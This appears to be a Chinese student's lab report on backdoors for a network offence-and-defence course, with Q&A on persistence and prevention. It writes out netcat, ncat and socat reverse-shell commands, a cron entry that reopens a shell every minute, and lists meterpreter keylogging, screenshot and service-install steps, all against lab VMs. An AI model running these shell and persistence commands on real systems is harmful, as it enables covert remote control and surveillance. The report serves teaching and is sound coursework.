20145228《网络对抗》 后门原理与实践

实验内容

•利用netcat和socat获取靶机shell，并实现任务计划启动；

•使用msf-meterpreter生成可执行后门文件获取靶机shell，并进行一些命令操作，如查看ip、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装服务等

基础问题回答

1、如何启动后门？

Windows
在控制面板-管理工具-任务计划程序中添加任务，

linux中设置cron

2、如何防止被其他人安装后门程序？

防火墙和防病毒软件必须处于打开状态，定时清理垃圾软件和恶意广告，定期进行杀毒软件全盘扫描。

3、Meterpreter有哪些给你映像深刻的功能？

记录键盘输入抓取以及摄像头拍摄功能，很强的监视功能。

4、例举你能想到的一个后门进入到你系统中的可能方式？

浏览网页时，点击弹出的广告下载程序；下载软件时，自动捆绑下载了其他恶意程序。

实验过程

使用netcat获取主机操作Shell，cron启动

·首先保证虚拟机与主机之间能PING通。

·然后下载ncat与socat到windows与linux里（linux自带ncat）

（1）windows获取linux的shell

·windows开启监听端口：

·kali发起连接请求：

·Windows获得Linux的Shell

•在windows上打开cmd，并通过ncat开放端口5228

•在linux上反弹连接win：nc 192.168.184.128 5228 -e /bin/sh

（2）Linux获得Windows的Shell

•在linux下设置监听端口：nc -l -p 5228

•在windows下请求连接：ncat 192.168.184.128 5228 -e cmd.exe

•在linux下输入ipconfig查看主机IP：

ncat传输文件

•windows系统使用ncat.exe -lv 1452 > 5228.exe监听准备接受文件

•kali系统使用ncat -nv 172.30.3.151 1452 <20145228来发送指定文件

使用socat获取主机操作Shell

（1）kali上用socat tcp-listen:5228把cmd绑定到端口5228

•同時用socat tcp-l:5228 system:bash,pty,stderr反弹连接

（2）windows使用socat readline tcp:172.30.1.251 5228开启监听

•使用ifconfig检测

meterpreter 生成后门程序

•使用msfconsole命令开启msf进行设置

•监听开始，在windows中运行之前的后门程序可以成功控制远程shell。

meterpreter信息搜集

•查看系统版本信息

•对靶机进行截图

•记录键盘输入

•安装为系统服务

设置后门自动启动

（1）Windows
•在控制面板-管理工具-任务计划程序中添加任务，编辑触发器等

（2）linux

cron启动

•kali下终端使用crontab -e修改配置文件

在最后一行后加入* * * * * /bin/ncat 172.30.1.154 5228 -e /bin/sh

*号代表时间

实验感悟

做完这个实验后，了解到了后门程序的植入以及运行方式，使我们在以后的生活中有着防范后门的意识，具有极大的积极作用。